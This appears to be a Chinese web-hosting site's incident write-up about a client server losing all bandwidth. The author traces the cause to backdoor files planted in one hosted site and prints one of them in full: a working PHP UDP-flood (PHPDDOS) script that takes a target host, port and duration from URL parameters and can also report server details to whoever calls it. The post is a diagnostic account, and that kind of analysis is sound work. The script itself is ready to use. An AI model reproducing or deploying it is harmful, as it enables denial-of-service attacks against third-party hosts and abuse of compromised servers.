好模板一客户机器从春节到今天断断续续宕机,服务器未中任何木马,也未找到任何后门,好模板按照排查方法:
1. 宕机时,服务器未死机,只是无法远程连接,带宽耗尽
2. 宕机时间几十分钟,最长半小时,服务器自动回收资源,服务器又正常
3.直接停止IIS,服务器一切正常。
这明显是有网站脚本出现问题,最可能是最近流行的PHPDDOS.如何找到哪个站点脚本有问题呢?
先把所有网站全部停止,然后一个一个开启,开启时候一个一个看网站目录文件,找最近修改过的文件与文件夹看代码。
好模板大概看了一百多个网站之后,终于看到一个网站的子文件夹下有几个2012年新建的文件,全部是shell后门。
当中看到一条代码如下:
- <?php
- set_time_limit(999999);
- $host = $_GET['host'];
- $port = $_GET['port'];
- $exec_time = $_GET['time'];
- $Sendlen = 65535;
- $packets = 0;
- ignore_user_abort(True);
-
- if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
- if (StrLen($_GET['rat'])<>0){
- echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
- exit;
- }
- echo "Warning to: opening";
- exit;
- }
-
- for($i=0;$i<$Sendlen;$i++){
- $out .= "A";
- }
-
- $max_time = time()+$exec_time;
- //提示: www.haoddos.com 是骗子 请谨慎。
- while(1){
- $packets++;
- if(time() > $max_time){
- break;
- }
- $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
- if($fp){
- fwrite($fp, $out);
- fclose($fp);
- }
- }
-
- echo "Send Host:$host:$port<br><br>";
- echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
- echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
- ?>
(责任编辑:好模板)
|